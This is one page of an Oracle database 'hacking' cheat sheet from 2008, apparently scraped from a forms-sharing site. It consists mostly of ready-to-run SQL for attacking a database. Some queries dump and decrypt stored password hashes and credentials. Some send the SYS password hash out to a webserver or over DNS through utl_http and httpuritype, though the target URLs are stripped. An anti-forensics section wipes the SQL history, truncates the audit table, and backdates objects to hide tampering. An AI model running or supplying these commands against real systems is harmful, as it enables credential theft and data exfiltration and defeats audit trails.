Oracle Cheat Sheet Page 4

ADVERTISEMENT

Information Retrieval:
Hacking Oracle
-
Version 1.5.0 - 29-Jan-2008
Get version:
select * from v$version
-- all users
Get security patchlevel:
select * from dba_registry_history;
-- only DBA, 9i+, empty or non existing table= no Security Patch
Installed database components:
select * from dba_registry;
-- only DBA
Get userlist:
select * from all_users;
-- all users
Get user & PW hashes(7-10g):
select username,password,account_status from dba_users;
-- only DBA until 10g R2
Get user & PW hashes(11g/10g):
select name,password,spare4,accountstatus from sys.user$, sys.dba_users where user#=user_id;
-- only DBA 11g R1
Get Apex password hashes:
select user_name, web_password_raw from flows_030000.wwv_flow_fnd_user;
-- only DBA, 030000 = APEX version 3.0, 020100=2.1
Decrypt Apex password hashes:
select user_name, utl_http.request(' '||web_password_raw||’&b=MD5-Search’) -- only DBA, requires internet access from the database
from flows_030000.wwv_flow_fnd_user;
Get Metalink account/password:
select sysman.decrypt(aru_username), sysman.decrypt(aru_password) from sysman.mgmt_aru_credentials;-- only DBA, 10g
Get password of mgmt_view_user select view_username, sysman.decrypt(view_password) from sysman.mgmt_view_user_credentials;
-- only DBA, 10g
Get passwords of DB/Grid control: select credential_set_column, sysman.decrypt(credential_value) from sysman.mgmt_credentials2;
-- only DBA, 10g
TDE encrypted tables:
select table_name,column_name,encryption_alg,salt from dba_encrypted_columns;
-- only DBA, 10g – 11g
Show code using encryption:
select owner, name, type, referenced_name from all_dependencies where referenced_name
-- show objects using database encryption (e.g. for passwords)
IN ('DBMS_CRYPTO', 'DBMS_OBFUSCATION_TOOLKIT')
Already DBA?
desc dba_users
-- only possible if DBA (or select any dictionary), not audited
Get system privileges:
select * from user_sys_privs;
-- show system privileges of the current user
Get role privileges:
select * from user_role_privs;
-- show role privileges of the current user
Get table privileges:
select * from user_tab_privs;
-- show table privileges of the current user
Get interesting tables:
select table_name,column_name,owner from dba_tab_columns where ((upper(column_name)
-- show tables with columns containing the string 'PWD’, ...
like '%PWD%' or upper(column_name) like '%PASSW%' or upper(column_name) like '%CREDEN%' or
-- the scripts anapassword.sql is checking all objects
upper(column_name) like '%AUTH%'))
Get tables with passwords:
@anapassword.sql
-- run the SQL script anapassword.sql
Get a list of all Oracle directories:
select * from dba_directories;
-- show Oracle directories
Access SQL history (v$sql):
select sql_text from sys.v$sql where lower(sql_text) like '%utl_http%’;
-- search all SQL statements in the database containing the string utl_http
Access SQL history (wrh$_sqltext): select sql_text from sys.wrh$_sqltext where lower(sql_text) like '%utl_http%’;
-- search all SQL statements containing the string utl_http
Check, if audit_sys_operations:
select name,value from v$parameter where name = 'audit_sys_operations';
-- check if commands submitted by SYS are audited
Check for database trigger:
select owner,trigger_name from dba_triggers where trigger_type='AFTER EVENT’;
-- check for logon, dll or startup/shutdown trigger
Search strings in tables (dbgrep)
@dbgrep.sql
-- run the SQL script dbgrep.sql (from RDS))
Get information from listener.log
@analistener.sql
-- run the SQL script analistener.sql (from RDS)
Web Access:
Web access via utl_http:
select utl_http.request(' ) from dual;
-- all users,, 8-10g R2
Web access via httpuritype:
select httpuritype( ' ' ).getclob() from dual;
-- all users,, 8-10g R2
Send password hash to webserver: select utl_http.request(' (select username||’=’||password from dba_users
-- only DBA, change value of username for other users
where username=’SYS’)) from dual;
Send password hash to webserver: select httpuritype(' (select username||’=’||password from dba_users
-- only DBA, change value of username for other users
where username=’SYS’)).getclob() from dual;
Send password hash via DNS:
select utl_http.request(' (select username||’=’||password from dba_users
-- only DBA, change value of username for other users
where username=’SYS’) ) from dual;
Anti-Forensics:
Clear v$sql:
alter system flush shared pool;
-- only DBA, all versions
Clear sys.wrh_sqlstat:
truncate table sys.wrh$_sqlstat;
-- only DBA, 10g/11g
Clear audit-Table:
truncate table sys.aud$;
-- only as SYS, all versions
Clear audit-Table:
delete table sys.aud$;
-- only, all versions
Change object creation date:
update sys.obj$ set ctime=sysdate-300, mtime=sysdate-300, stime=sysdate-300 where name='AUD$';
-- change the creation date of an object

ADVERTISEMENT

00 votes

Related Articles

Top 20 Happy Easter Cards And Gift Tags To Download For Free
Top Ten Easter Arts And Crafts Activities For Your Kids
Free Easter Coloring Pages And Easter Printables For Your Kids

Related forms

Oracle Pl/sql Cheat Sheet Oracle Pl/sql Cheat Sheet Education
Oracle Sql Function Cheat Sheet Oracle Sql Function Cheat Sheet Education
Cheat Sheet - Subnetting Cheat Sheet - Subnetting Education
Cheat Sheet For Probability Theory Cheat Sheet For Probability Theory Education
Cheat Sheet For Geometry Cheat Sheet For Geometry Education
Cheat-sheet-mel-4 Cheat-sheet-mel-4 Education
Cheat Sheet For Writing A Scientific Manuscript Cheat Sheet For Writing A Scientific Manuscript Education
Cheat Sheet - Cumulus Linux Cheat Sheet - Cumulus Linux Education
Cheat Sheet: Housing Status And Program Type Eligibility Cheat Sheet: Housing Status And Program Type Eligibility Legal
Cheat Sheet - Success Formula Cheat Sheet - Success Formula Business

Related Categories

Parent category: Education
Download
Go
Page of 5